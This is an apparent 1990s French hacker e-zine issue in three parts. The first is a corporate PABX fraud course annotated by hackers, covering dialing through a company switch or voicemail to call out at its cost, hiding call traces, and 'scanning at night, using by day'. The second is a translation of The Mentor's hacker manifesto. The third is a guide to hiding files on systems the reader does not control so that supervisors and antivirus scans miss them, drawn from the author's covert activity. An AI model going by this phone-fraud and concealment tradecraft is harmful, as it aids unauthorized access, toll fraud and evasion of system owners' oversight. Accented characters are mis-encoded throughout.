9<EFBFBD>) Les couts du piratage:
|
|||
|
A) cout des fonctionalit<69>s
|
|||
|
B) cout de la telemaintenance
|
|||
|
C) Piratage volontaire du PABX
|
|||
|
D) Piratage de l'informatique
|
|||
|
10<EFBFBD>) Les m<>thodes:
|
|||
|
A) Introduction
|
|||
|
B) La m<>thode MARION
|
|||
|
C) La m<>thode MELISA
|
|||
|
11<EFBFBD>) La loi godfrain: [ Rahhhh.. chiotte galactique !]
|
|||
|
A) Intro
|
|||
|
B) destruction
|
|||
|
C) les niveaux de cette loi.
|
|||
|
|
|||
|
Document
|
|||
|
|
|||
|
1<EFBFBD>) A)
|
|||
|
taux normal: augmentation de la facture : 4% tous les deux mois.
|
|||
|
Element moteur: elevation anormale de la facturation
|
|||
|
controle par rapport aux factures precedentes.
|
|||
|
detection: taux d'augmentation constant, passant brutalement d'une
|
|||
|
facture sur l'autre de 4% <20> 9%
|
|||
|
constat: augm.o brutale de 5% en plus des 4% habituels.
|
|||
|
pourquoi?
|
|||
|
- pas de changement de contrat, pas de creation de nouveau service.
|
|||
|
Action: demande de controle et facturation detaillee pour les mois a
|
|||
|
venir.
|
|||
|
B) facture suivante:
|
|||
|
meme chose : augmentation 9%
|
|||
|
analyse: verif de la fact. detaillee.
|
|||
|
constat: - appels minitel
|
|||
|
- appels vers l'<27>tranger
|
|||
|
- appels en dehors des heures ouvrables
|
|||
|
question: interne ou externe?
|
|||
|
reponse: les deux
|
|||
|
conclusion: le syst<73>me est pirat<61>.
|
|||
|
|
|||
|
Cette conclusion doit rester interne et confidentielle.
|
|||
|
|
|||
|
action: eliminer les causes interne en premier
|
|||
|
action sys: controle d'acces
|
|||
|
>>> EVITER DE FAIRE CONTROLER SON SYSTEME PAR SON INSTALLATEUR OU
|
|||
|
CONSTRUCTEUR DANS UN PREMIER TEMPS.
|
|||
|
C) prise de conscience
|
|||
|
a) demande d'info:
|
|||
|
- autres entreprise
|
|||
|
- presse sp<73>cialis<69>e
|
|||
|
b) declenchement d'une mission interne preliminaire:
|
|||
|
1) constitution d'un groupe de travail.
|
|||
|
2) definir les objectifs
|
|||
|
3) definir un planning
|
|||
|
4) rechercher un cabinet independant disposant d'experts en la
|
|||
|
matiere.
|
|||
|
5) presentation du probleme.
|
|||
|
6) Etablir un contrat definissant la mission du cabinet.
|
|||
|
7) signature du contrat.
|
|||
|
c) declenchement d'un audit.
|
|||
|
1) def.o de la mission
|
|||
|
2) planif.o " "
|
|||
|
3) analyse physique de l'existant
|
|||
|
4) analyse des risques financiers
|
|||
|
5) analyse du syst<73>me
|
|||
|
6) definition des controles <20> mettre en oeuvre
|
|||
|
7) definition des tests <20> r<>aliser
|
|||
|
8) mise en oeuvre de 6 et 7 [ OUARF... TROP UTILE LA 8) !!! ;) ]
|
|||
|
9) [yen a pas!!!! bin alors ?? ;) ]
|
|||
|
10) Consignation des r<>sultats
|
|||
|
11) les recommandations <20> mettre en oeuvre
|
|||
|
12) Synth<74>se <20>conomique et technique sur les risques et les moyens
|
|||
|
compl<70>mentaires de protection <20> mettre en oeuvre.
|
|||
|
d) action:
|
|||
|
mise en place des solution d'urgence pr<70>conis<69>es.
|
|||
|
|
|||
|
2<EFBFBD>) [ c'est chiant je passe]
|
|||
|
r<>sum<75>: voir si ya pas un employ<6F> qu'est parti <20> la concurrence.
|
|||
|
|
|||
|
3<EFBFBD>) les types de pirate:
|
|||
|
A) detournement d'une ligne pour t<>l<EFBFBD>phoner [ ouais !!!!! Beige Box rules ]
|
|||
|
B) detournement d'une ligne pour appeler des serveurs Nitel [ kewl ! ]
|
|||
|
C) ecoute des communications [ c'est vous qui le dite ;) ]
|
|||
|
D) Le pirate informatique, vol d'information [ bande de paranos, on
|
|||
|
en a rien a foutre de votre bilan commercial cumul<75> sur l'effectif
|
|||
|
diff<66>r<EFBFBD> r<>troactif.... tout ce qu'on veut c'est VOTRE SYSTEME !! ;) ]
|
|||
|
E) Le sabotage des syst<73>mes [ ya que les burnes qui font ca ! ]
|
|||
|
F) Le pirate sportif [ ouais !!!!! ca c'est kewl ! ]
|
|||
|
|
|||
|
A) detournement d'une ligne pour t<>l<EFBFBD>phoner [ ouais !!!!! Beige Box rules ]
|
|||
|
Objectif: telephoner gratuitement <20> cout moindre
|
|||
|
[ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ]
|
|||
|
[ mais il <20>tait raide bourr<72> le mec qui a ]
|
|||
|
[ <20>crit cela !!!! hahaha... je suis pete de rire ]
|
|||
|
Ce detournement peut etre volontaire: [ plutot oui! ]
|
|||
|
- programmation volontaire sur un poste ou dans le pabx.
|
|||
|
- appel d'un auxiliaire du PABX, messagerie vocale par exemple,
|
|||
|
pour ressortir vers l'exterieur.
|
|||
|
Pour un appel vers l'etranger, le pirate sera tax<61> de son
|
|||
|
domicile au PABX pirat<61>. Ce dernier sera tax<61> pour la ligne
|
|||
|
<20>tablie jusqu'<27> l'<27>tranger.
|
|||
|
ou involontaire: [ on y croit ! ]
|
|||
|
mauvaise affectation des taxes sur les postes.
|
|||
|
- lors de l'utilisation de la fonction conference
|
|||
|
- transfert
|
|||
|
- renvoi
|
|||
|
|
|||
|
B) Detournement pour appeler des serveurs minitel:
|
|||
|
le detournement dans ce cas est generalement volontaire [ ouahahahaha ]
|
|||
|
La m<>thode consiste <20> appeler le PABX d'une soci<63>t<EFBFBD>:
|
|||
|
- obtenir une ligne sur le PABX
|
|||
|
- surnum<75>roter cette ligne
|
|||
|
- ressortir vers l'exterieur.
|
|||
|
- obtenir la liaison avec un serveur.
|
|||
|
|
|||
|
C) Ecoute teleph
|
|||
|
[ c'est chiant, je tape pas ces conneries ! ]
|
|||
|
|
|||
|
D) Le pirate informatique, vol d'information
|
|||
|
|
|||
|
PIRATE ===> PABX soci<63>t<EFBFBD> A
|
|||
|
||
|
|||
|
||
|
|||
|
\/
|
|||
|
Central FT ville 1 =====> Central FT Ville 2
|
|||
|
||
|
|||
|
||
|
|||
|
\/
|
|||
|
Site informatique pirat<61>.
|
|||
|
|
|||
|
[ comme ca la trace est remont<6E>e plus difficilement ]
|
|||
|
|
|||
|
E) Le sabotage des syst<73>mes
|
|||
|
[ PFFFF..... ]
|
|||
|
|
|||
|
F) Le pirate sportif [ La le mec sait ce qu'il dit ! ]
|
|||
|
Objectif du pirate: l'argent n'est pas la motivation principale,
|
|||
|
du moins au d<>part.
|
|||
|
buts: * se connecter <20> un max de syst<73>me
|
|||
|
* penetrer par jeu
|
|||
|
* s'introduire au coeur meme du syst<73>me par d<>fi
|
|||
|
methode utilis<69>ee:
|
|||
|
* recherche des num<75>ros d'appel
|
|||
|
* recherche de mot de passe
|
|||
|
* contourner les protections
|
|||
|
* acceder aux fonctions interdites
|
|||
|
|
|||
|
Son but n'est pas de casser. Il peut seulement souhaiter utiliser des
|
|||
|
heures machines ou des donn<6E>es.
|
|||
|
Peu dangereux, il peut le devenir si: [ jamais vu cela ! ]
|
|||
|
- il donne ses infos <20> des tiers sans scrupules
|
|||
|
- des soci<63>t<EFBFBD> concurrentes
|
|||
|
- il est recrut<75> pour l'argent
|
|||
|
|
|||
|
4<EFBFBD>)
|
|||
|
A) Piratage physique des lignes analogiques
|
|||
|
|
|||
|
FT Central FT
|
|||
|
||
|
|||
|
-------------------- ||
|
|||
|
\/
|
|||
|
Soci<EFBFBD>t<EFBFBD> PABX
|
|||
|
||
|
|||
|
\/
|
|||
|
-------------------- repartiteur dans la cabine PABX. *
|
|||
|
||
|
|||
|
Immeuble de la soci<63>t<EFBFBD> ||
|
|||
|
\/
|
|||
|
repartiteur g<>n<EFBFBD>ral * $
|
|||
|
||
|
|||
|
||
|
|||
|
\/
|
|||
|
sous repartit d'<27>tage * $
|
|||
|
||
|
|||
|
||
|
|||
|
\/
|
|||
|
poste tel . * $
|
|||
|
|
|||
|
[ une * == point de piratage physique possible en analogique ]
|
|||
|
[ un $ == point de piratage physique possible en num<75>rique ]
|
|||
|
|
|||
|
Piratage physique des lignes.
|
|||
|
a) methode simple et a peu de frais. Possibilit<69> de se connecter sur
|
|||
|
tous les points du cheminement de la sortie du central au point
|
|||
|
final d'implantation du poste.
|
|||
|
b) Dans le cas d'un raccordement num<75>rique du PABX, il ne sera pas
|
|||
|
possible de se raccorder sur le cheminement du central <20> la soci<63>t<EFBFBD>.
|
|||
|
Un piratage de ce type necessite un equipement d'un cout tres
|
|||
|
dissuasif.
|
|||
|
La partie sensible se situe donc entre le PABX et la prise murale ou
|
|||
|
est connect<63> le poste analogique. Le pirratage ne pourra etre fait
|
|||
|
qu'a L'INTERIEUR de l'immeuble.
|
|||
|
c) Dans le cas d'une liaison num<75>rique de bout en bout, le piratage <20>
|
|||
|
peu de frais deviens impossible [Ah ouais? t'veux une contre preuve?]
|
|||
|
|
|||
|
|
|||
|
B) Piratage des fonctionnalit<69>s du PABX
|
|||
|
Nous avons ici deux types de piratage possible:
|
|||
|
* volontaire avec les fonctionnalit<69>s disponible dans le PABX.
|
|||
|
* involontaire : affectation des taxes a un autre poste que le sien
|
|||
|
sans l'avoir voulu.
|
|||
|
Il s'agit le plus souvent de mauvais parametrage lors de la
|
|||
|
programmation ou des erreurs dans le logiciel lors de sa conception.
|
|||
|
|
|||
|
Exemple concret li<6C> <20> un bug:
|
|||
|
si l'initiateur d'unee conference avec deux correspondant exterieurs
|
|||
|
raccroche en premier, question:
|
|||
|
- est ce que les deux autres personnes seront coup<75>es
|
|||
|
- Si la r<>ponse est non qui sera taxe?
|
|||
|
Idem dans le cas d'un appel transf<73>r<EFBFBD> vers l'exterieur.
|
|||
|
|
|||
|
Les fonctionnalit<69>s concern<72>es sont:
|
|||
|
* conference: verifier si les corresp. st coup<75>s qd l'initiateur
|
|||
|
raccroche
|
|||
|
* transfert : lors des transferts interne, verifier si la repartition
|
|||
|
des taxes s'effectue correctement.
|
|||
|
* renvoi: avec un MIC T2 grand confort, il est possible de renvoyer les
|
|||
|
communication vers l'exterieur.
|
|||
|
* recuperation des fonctionnalit<69> d'un poste de direction par un code
|
|||
|
et son mot de passe. Cette fonction permet a partir de n'importe quel
|
|||
|
poste de la soci<63>t<EFBFBD> de r<>cup<75>rer le 19 en affectant le ticket de
|
|||
|
taxation au poste directeur.
|
|||
|
|
|||
|
C) Piratage par telemaintenance.
|
|||
|
[ce qui suit est ma description des schemas:
|
|||
|
Fonction de t<>l<EFBFBD>maintenance:
|
|||
|
* Controle de qualit<69> d'une ligne : permet d'appeler n'importe quel
|
|||
|
num<75>ro.
|
|||
|
* Programmation d'un poste fantome puis renvoi. ]
|
|||
|
a) il est possible d'appeler un PABX et de se faire rappeler
|
|||
|
simultanement. Le but est de contr<74>ler l'<27>tablissement de la
|
|||
|
liaison et de mesurer sa qualit<69>:
|
|||
|
- en affaiblissement
|
|||
|
- en paradiaphonie
|
|||
|
- en reverberation
|
|||
|
Au lieu de se faire rappeler sur le site de contr<74>le, un
|
|||
|
technicien peut en profiter pour appeler un correspondant <20>
|
|||
|
l'<27>tranger ou des serveurs minitel.
|
|||
|
Les taxes seront donc affect<63> au site control<6F>!
|
|||
|
b) Il est possible par telemaintenance de d<>clarer par programmation un
|
|||
|
poste dit fantome dans un PABX distant.
|
|||
|
Il existe dans la machine mais il n'est physiquement pas pr<70>sent sur
|
|||
|
le site.
|
|||
|
|
|||
|
D) Piratage d'un auxiliaire d'un PABX.
|
|||
|
Ce type de piratage est possible par le biais des options install<6C>es
|
|||
|
sur un autocommutateur t<>l<EFBFBD>phonique.
|
|||
|
Sont concern<72>s:
|
|||
|
* serveurs vocaux
|
|||
|
* messageries vocales
|
|||
|
* les op<6F>rateurs automatiques
|
|||
|
|
|||
|
Moyen de protection: Sur incident, appel non abouti il est souhaitable
|
|||
|
de r<>orienter les appels vers la standardiste. Cette pr<70>caution
|
|||
|
emp<6D>che un correspondant exterieur de surnum<75>roter pour rappeler un
|
|||
|
autre poste <20> travers le PABX.
|
|||
|
|
|||
|
E) Piratage par une base TSF.
|
|||
|
[ bof, je tape pas ca:
|
|||
|
On passe dans les couloirs de la soci<63>t<EFBFBD> avec un t<>l<EFBFBD>phone sans fil
|
|||
|
et on essaye d'accrocher une base ! ]
|
|||
|
|
|||
|
5<EFBFBD>)
|
|||
|
A) acces aux locaux:
|
|||
|
[ resum<75>: - salle PABX ferm<72>e
|
|||
|
- acces control<6F>s
|
|||
|
- que des techniciens habilit<69>s.
|
|||
|
- mm ch pr la salle d'exploit.
|
|||
|
- gaines techniques fermees
|
|||
|
- cabine de sous repartition control<6F>e et surveill<6C>e
|
|||
|
- chemins de cable visibles cercl<63>s et couverts!
|
|||
|
B) protec des infos.
|
|||
|
Enferm<72> dans des armoires:
|
|||
|
- derniere programmation
|
|||
|
- support annuaire technique
|
|||
|
- la composition des tetes PTT
|
|||
|
- la composition du systeme ne doit pas etre divulgu<67> surtout si des
|
|||
|
auxiliaires sont raccord<72>s derriere le PABX.
|
|||
|
|
|||
|
Attention:
|
|||
|
Les microordinateurs envoy<6F>s en r<>paration, peuvent contenir des
|
|||
|
informations sensibles:
|
|||
|
- annuaire technique complet
|
|||
|
- annuaire extern
|
|||
|
- liste des num<75>ros abr<62>g<EFBFBD>s
|
|||
|
- liste des techniciens habilit<69>s.
|
|||
|
- liste des mots de passe
|
|||
|
- la taxation contenant tous les num<75>ros appel<65>s.
|
|||
|
|
|||
|
C) Destruction des supports obsolete:
|
|||
|
[ en bref, on passe tout au broyeur et DELETE et FORMAT ne sont pas
|
|||
|
effectifs ! ]
|
|||
|
|
|||
|
D) Sauvegarde
|
|||
|
|
|||
|
6<EFBFBD>) Les moyens de contr<74>le:
|
|||
|
A) La taxation telephonique:
|
|||
|
[ sch<63>ma montrant une imprimante connect<63>e au modem de maintenance du
|
|||
|
PABX avec consoles d'observ du trafic, de taxation et console systeme PABX
|
|||
|
ainsi qu'une messagerie vocale.
|
|||
|
]
|
|||
|
Doit permettre un controle sur une periode param<61>trable pour les appels
|
|||
|
<20>mis par poste, service, direction.
|
|||
|
* a l'etranger
|
|||
|
* en province
|
|||
|
* en local
|
|||
|
|
|||
|
B) Observ. du trafic:
|
|||
|
permet de reperer les lignes modem du PABX appel<65>es en dehors des
|
|||
|
heures ouvrables.
|
|||
|
[ ***CONCLUSION*** ***IMPORTANTE*** DONC :
|
|||
|
SCANNEZ LA NUIT MAIS ------> *** UTILISEZ LE JOUR *** ]
|
|||
|
Tres utile en cas de piratage du PABX pour determiner les faisceaux
|
|||
|
utilis<69>s pour entrer et ressortir a travers le PABX et ses auxiliaires.
|
|||
|
|
|||
|
Afin de faciliter ce rep<65>rage, il est possible d'extraire les appels
|
|||
|
ressortantss dans la meme minute que les appels quii arrivent sur le
|
|||
|
PABX.
|
|||
|
Cette possibilit<69> facilite grandement l'analyse si des temporisations
|
|||
|
n'ont pas <20>t<EFBFBD> program<61>es.
|
|||
|
|
|||
|
Les tickets des appels <20>mis par un PABX et non compris par le PC
|
|||
|
d'observation de trafic doivent etre stock<63>s pour traitement ult<6C>rieur.
|
|||
|
|
|||
|
Ne pas oublier que la puissance de traitement d'un systeme p<>riph<70>rique de
|
|||
|
taxation ou d'observation t<>l<EFBFBD>phonique est li<6C>e <20> la richesse des
|
|||
|
informations d<>livr<76>es par le PABX d'un constructeur.
|
|||
|
|
|||
|
Exemple: si le PABX n'a que des compteurs pour les emissions et les
|
|||
|
receptions d'appels, il sera impossible de faire un horodatage et de
|
|||
|
determiner les heures de pointes.
|
|||
|
|
|||
|
--
|
|||
|
Fin de la premi<6D>re partie
|
|||
|
--
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.5
|
|||
|
|
|||
|
|
|||
|
\/\La Conscience d'un hacker/\/
|
|||
|
|
|||
|
par
|
|||
|
|
|||
|
+++The Mentor+++
|
|||
|
|
|||
|
Ecrit le 8 Janvier 1986
|
|||
|
|
|||
|
Traduit par NeurAlien le 8 septembre 1994.
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
Un autre s'est fait prendre aujourd'hui, c'est partout dans les
|
|||
|
journaux. "Scandale: Un adolescent arret<65> pour crime informatique",
|
|||
|
"Arrestation d'un 'hacker' apr<70>s le piratage d'une banque"...
|
|||
|
Satan<61>s gosses, tous les m<>mes.
|
|||
|
|
|||
|
Mais avez vous, dans votre psychologie en trois piece et votre profil
|
|||
|
technocratique de 1950, un jour pens<6E> <20> regarder le monde derriere les yeux
|
|||
|
d'un hacker? Ne vous etes vous jamais demand<6E> ce qui l'avait fait agir,
|
|||
|
quelles forces l'avaient model<65>?
|
|||
|
Je suis un hacker, entrez dans mon monde...
|
|||
|
Le mien est un monde qui commence avec l'<27>cole... Je suis plus
|
|||
|
astucieux que la pluspart des autres enfants, les conneries qu'ils m'apprennent
|
|||
|
me lassent...
|
|||
|
|
|||
|
Je suis au coll<6C>ge ou au lyc<79>e. J'ai <20>cout<75> les professeurs expliquer
|
|||
|
pour la quizieme fois comment r<>duire une fraction. Je l'ai compris.
|
|||
|
"Non Mme Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma t<>te"
|
|||
|
Satan<61> gosses. Il l'a certainnement copi<70>. Tous les m<>mes.
|
|||
|
|
|||
|
J'ai fait une d<>couverte aujourd'hui. J'ai trouv<75> un ordinateur.
|
|||
|
Attends une minute, c'est cool. Ca fait ce que je veux. Si ca fait une
|
|||
|
erreur, c'est parce que je me suis plant<6E>.
|
|||
|
Pas parce qu'il ne m'aime pas...
|
|||
|
Ni parce qu'il se sent menac<61> par moi...
|
|||
|
Ni parce qu'il pense que je suis petit filoux...
|
|||
|
Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas <20>tre l<>...
|
|||
|
Satan<61>s gosses. Tout ce qu'il fait c'est jouer. Tous les m<>mes.
|
|||
|
|
|||
|
Et alors c'est arriv<69>... une porte s'est ouverte sur le monde... Se
|
|||
|
pr<EFBFBD>cipitant a travers la ligne t<>l<EFBFBD>phonique comme de l'h<>roine dans les veines
|
|||
|
d'un accro, une impulsion electronique est envoy<6F>e, on recherche un refuge <20>
|
|||
|
l'incompetence quotidienne... un serveur est trouv<75>.
|
|||
|
|
|||
|
Vous vous repetez que nous sommes tous pareils... On a <20>t<EFBFBD> nourri <20> la
|
|||
|
petite cuillere de bouffe pour b<>b<EFBFBD> <20> l'<27>cole quand on avait faim d'un steak...
|
|||
|
Les fragments de viande que l'on nous a laiss<73> <20>taient pr<70>-mach<63>s et sans gout.
|
|||
|
On a <20>t<EFBFBD> domin<69> par des sadiques ou ignor<6F> par des apathiques. Les seuls qui
|
|||
|
avaient des choses <20> nous apprendre trouv<75>rent des <20>l<EFBFBD>ves volontaires, mais
|
|||
|
ceux ci sont comme des gouttes dans le desert.
|
|||
|
|
|||
|
C'est notre monde maintenant... Le monde de l'<27>l<EFBFBD>ctron et de
|
|||
|
l'interrupteur, la beaut<75> du baud. Nous utilisons un service d<>ja existant,
|
|||
|
sans payer ce qui pourrait <20>tre bon march<63> si ce n'<27>tait pas la propri<72>t<EFBFBD>
|
|||
|
de gloutons profiteurs, et vous nous appelez criminels. Nous explorons... et
|
|||
|
vous nous appelez criminels. Nous recherchons la connaissance... et vous nous
|
|||
|
appelez criminels. Nous existons sans couleur de peau, sans nationalit<69>, sans
|
|||
|
dogme religieux... et vous nous appelez criminels.
|
|||
|
Vous construisez des bombes atomiques, vous financez les guerres,
|
|||
|
vous ne punissez pas les patrons de la mafia aux riches avocats,
|
|||
|
vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous
|
|||
|
faire croire que c'est pour notre propre bien <20>tre, et nous sommes encore des
|
|||
|
criminels.
|
|||
|
|
|||
|
Oui, je suis un criminel. Mon crime est celui de la curiosit<69>. Mon
|
|||
|
crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur
|
|||
|
apparence.
|
|||
|
Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez
|
|||
|
jamais.
|
|||
|
|
|||
|
Je suis un hacker, et ceci est mon manifeste. Vous pouvez arreter cet
|
|||
|
individu, mais vous ne pouvez pas tous nous arreter...
|
|||
|
apr<EFBFBD>s tout, nous sommes tous les m<>mes.
|
|||
|
|
|||
|
+++The Mentor+++
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.6
|
|||
|
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
|
|||
|
<20> Data dissimulation techniques: <20>
|
|||
|
<20> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <20>
|
|||
|
<20> Hiding your data in <20>
|
|||
|
<20> a Restricted and Patrolled <20>
|
|||
|
<20> District of CyberSpace. <20>
|
|||
|
<20> ------------------------------ <20>
|
|||
|
<20> Written by Arscene <20>
|
|||
|
<20> for N0Way <20>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
|
|||
|
|
|||
|
I) Intro & Thanks & Disclaimer
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Dans la, heum, discipline, qui est la notre il arrive souvent que
|
|||
|
nous ayions a dissimuler une certaine quantit<69> de Data sur un
|
|||
|
systeme que nous visitions, ou qui possede des resources auquelles
|
|||
|
nous n'avons pas access, et generalement dont il ne profite pas
|
|||
|
pleinement. Il nous arrive aussi d'avoir a communiquer dans un
|
|||
|
environnement peu sur et control<6F> par des individus paranoiaques et
|
|||
|
megalomanes. C'est pour ces deux raisons que j'ai ecrit ce file.
|
|||
|
Il s'adresse a tous, et j'espere qu'il vous sera utile (Que j'ai
|
|||
|
pas pass<73> des nuits blanches pour rien, quoi).
|
|||
|
Remerciements/greets/good_karma a NeurAlien, Omega et O'Connell
|
|||
|
pour etre qui ils sont.
|
|||
|
GreetZ a tous les lecteurs de N0Way. N'oubliez pas que l'avenir;
|
|||
|
c'est vous. Et que vous etes defini par vos actions, et non votre
|
|||
|
pass<73>.
|
|||
|
This file also dedicated to Mr Toubon for his open mindedness and
|
|||
|
his efforts towards harmonious internationalisation. Also to Mr
|
|||
|
Pasqua for his efforts to preserve peace at all cost and his
|
|||
|
unswaying belief in the principles of democracy, justice, and
|
|||
|
freedom.
|
|||
|
Bon, je suis sur que NeurAlien vas nous faire une superbe
|
|||
|
Disclaimer qui couvre tout, mais j'aimerais rajouter la mienne:
|
|||
|
|
|||
|
De ce texte complet, je n'ais ecrit et pens<6E> que ces trois lignes.
|
|||
|
Dans ces trois lignes, une et une seule est un mensonge.
|
|||
|
Avant-hier, j'ai pens<6E> voir un OVNI.
|
|||
|
|
|||
|
Faites moi du mail sur ce que vous pensez de ce Disclaimer, et vos
|
|||
|
id<69>es pour faire mieux.
|
|||
|
|
|||
|
II) Cacher un file dans le OS
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Bon, d'abord les principes de base. Si vous etes sur un systeme '<27>tranger'
|
|||
|
(dont vous n'avez pas le controle complet), il arrive que vous vouliez
|
|||
|
posseder quelques files (fichiers), sans que les autres users, ou meme le
|
|||
|
Supervisor, ne le sache. Il faut donc les cacher.
|
|||
|
|
|||
|
1) Les attributs de systeme:
|
|||
|
|
|||
|
La, on pense tout de suite aux attributs speciaux de fichiers (Cach<63> ou
|
|||
|
Systeme, sous MS-DOS). Mais, si ces attributs font partie du systeme ils
|
|||
|
sont tres connus, et bon nombre de programmes peuvent les modifier, ou les
|
|||
|
ignorent tout simplement. Ils servent en general a proteger l'utilisateur
|
|||
|
de lui meme, en evitant par exemple qu'il n'efface des fichiers systemes.
|
|||
|
Par exemple: Cr<43><72>z un fichier DOS puis faites soit ATTRIB +H ou ATTRIB +S
|
|||
|
dessus, et allez dans le file manager de Windows (Vous ne l'utilisez peut
|
|||
|
etre pas souvent, mais le proprietaire de systeme si). Allez sur le
|
|||
|
drive/dir ou est votre fichier cach<63>. Normalement vous ne le voyez pas.
|
|||
|
Vous ne pouvez pas non plus l'effacer.
|
|||
|
Maintenant allez dans Affichage/Par type de fichiers. Cliquez sur
|
|||
|
'Visualiser les fichiers systemes/cach<63>s'. En revenant a l'ecran principal
|
|||
|
vous devriez voir votre fichier, mais en plus il aura un point
|
|||
|
d'exclamation rouge a cot<6F> de son nom, et il n'est plus tres discret
|
|||
|
maintenant.
|
|||
|
De meme, si vous avez LapLink 3 (recommand<6E>), vous avez surement remarqu<71>
|
|||
|
qu'il affiche les fichiers normaux en gris-DOS standard, mais les fichiers
|
|||
|
cach<63>s ou systemes sont affich<63>s en Blanc (High intensity) avec un '*'
|
|||
|
devant leur nom. Ideal pour se faire reperer.
|
|||
|
|
|||
|
2) Le choix:
|
|||
|
|
|||
|
Les attributs du systeme peuvent donc soit bien dissimuler le fichier,
|
|||
|
soit le rendre tres evident. Il y a donc un choix a faire. Pensez vous que
|
|||
|
la/les personnes a qui vous voulez dissimuler le fichier seront assez
|
|||
|
intelligentes pour cliquer sur le bouton ? (C'est une vraie question, pas
|
|||
|
une question rhetorique). La reponse par default, dans mon cas, est Oui. Je
|
|||
|
prefere ne pas cacher mes files et utiliser d'autres options.
|
|||
|
|
|||
|
3) Tout en haut de l'arbre:
|
|||
|
|
|||
|
Comme un object cach<63> dans un arbre, un file cach<63> profond en haut de
|
|||
|
l'arbre est plus dur a reperer que si vous le laissiez dans la racine. En
|
|||
|
regle generale il ne faut rien mettre dans la racine, et preferer au moins
|
|||
|
2 niveaux de profondeure. Voici un exemple:
|
|||
|
Pour une raison qui m'est propre je devais charger un TSR sur une PC en
|
|||
|
reseau Novell. Il fallait une ligne dans l'autoexec, et un endroit ou
|
|||
|
mettre le fichier sur le disque dur. Cette machine etait frequement utilis<69>
|
|||
|
par le SUPERVISOR (on se demande ce que faisait le TSR, hum ;-)) et
|
|||
|
l'AUTOEXEC.BAT lan<61>ait un antivirus resident qui scannait la racine
|
|||
|
de C: au demarage. Les noms des fichiers sur C:\ s'affichant
|
|||
|
pendant le scan. J'ai donc mis le fichier dans C:\DOS. Ainsi il
|
|||
|
n'etait pas remarqu<71> par le scan, et la ligne dans l'autoexec ne
|
|||
|
paraissait pas suspecte car l'autoexec.bat sert justement a charger
|
|||
|
des programmes du repertoire DOS. Cet exemple me permet d'ajouter
|
|||
|
qu'il faut toujours essayer de placer un fichier parmi ses
|
|||
|
semblables, du moins exterieurement (j'y reviendrait en 4).
|
|||
|
|
|||
|
Un autre exemple: J'avais un fichier de +4Mo a dissimuler sur un poste en
|
|||
|
local, le temps que je puisse amener de quoi le backup et le ramener chez
|
|||
|
moi. Je l'ai mis dans C:\EXCEL\EXEMPLES\AUTRE, il y a de cela au moins 6
|
|||
|
mois. A derni<6E>re verification il y etait encore. Peu de gens s'aventurent
|
|||
|
haut dans un arbre, surtout s'il parait conforme. Une petite note quand
|
|||
|
meme: N'en faites pas trop. Il ne faut pas que le chemin soit sensiblement
|
|||
|
plus long que la moyenne sur le disque, car un backup ou un TREE pourrait
|
|||
|
le reperer aisement.
|
|||
|
Pour clore cette partie il me faut reserver une mention speciale a nos
|
|||
|
amis de chez M$, et plus particulierement le repertoire WINDOWS\SYSTEM.
|
|||
|
Celui-ci existe sur la grande majorit<69> des machines, peut etre meme la
|
|||
|
votre. Combien d'entre vous savent combien de fichiers ils ont dans ce
|
|||
|
repertoire, et ce que fait chaque fichier ? En gros, on peut TOUT fourrer
|
|||
|
dans ce repertoire, si ce n'est ni trop gros ni trop voyant. Personne ne
|
|||
|
s'en rendra compte.
|
|||
|
|
|||
|
4) "A rose by any other name would smell as sweet"
|
|||
|
|
|||
|
Pour ceux qui n'auraient pas compris ma citation de Shakespeare, Juliet
|
|||
|
dit qu'une rose, meme si on changait son nom, aurait quand meme la (bonne)
|
|||
|
odeure d'une rose. Mais un file ne sent pas, d'ou l'interet de changer son
|
|||
|
nom pour le dissimuler (Logique suspecte).
|
|||
|
Un nom qui fasse temporaire ( *.$$$, ~*.TMP, etc) est assez bon pour une
|
|||
|
courte periode, mais un sys/user intelligent risque de l'effacer au bout
|
|||
|
d'un moment. Un nom invent<6E> est bon, de preference un nom qui ne soit pas
|
|||
|
comprehensible, de sorte a faire fichier systeme. Explication: En general
|
|||
|
un user va essayer de lire un file du nom README.NOW, il lira probablement
|
|||
|
le file WHATEVER.TXT, peut etre pas WHATEVER.DAT et surement pas PR4)Q567
|
|||
|
sans extension.
|
|||
|
Un nom de ce type est bon, mais ce n'est pas ce qui se fait de mieux. Le
|
|||
|
nom devrait s'integrer a son environnement. Regardez se qui existe deja
|
|||
|
dans les alentours. Par exemple j'ai mis deux fichiers (HACK et VIEW pour
|
|||
|
ceux que cela interresse) dans le ROOT d'un drive ou il existait MENU1.OLD
|
|||
|
et MENU2.OLD. Simplement en les appelent MENU3.OLD et MENU4.OLD ils sont
|
|||
|
restes 'invisibles' pendant plus d'un mois (puis je les ais enlev<65>).
|
|||
|
